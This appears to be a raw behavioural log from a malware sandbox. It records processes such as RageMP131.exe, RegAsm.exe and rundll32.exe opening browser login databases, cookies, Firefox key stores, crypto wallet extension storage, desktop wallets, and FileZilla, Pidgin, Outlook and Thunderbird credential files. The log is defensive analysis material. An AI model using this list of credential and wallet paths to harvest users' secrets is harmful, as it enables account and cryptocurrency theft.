Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\kwTJRnYVwAQEhcNiCzeUXAdMAbCUXdSzVvyfmsqkGAXe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\5454e6f062\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000020001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\1000021002\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
